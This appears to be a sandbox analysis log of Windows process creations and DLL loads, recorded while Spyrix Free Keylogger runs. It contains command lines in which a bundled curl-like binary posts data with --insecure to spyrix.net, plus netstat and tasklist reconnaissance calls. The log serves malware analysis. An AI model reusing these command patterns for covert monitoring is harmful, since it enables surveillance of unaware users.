Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1912,i,17144999493896228581,15445594864361974383,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Section loaded: sxs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
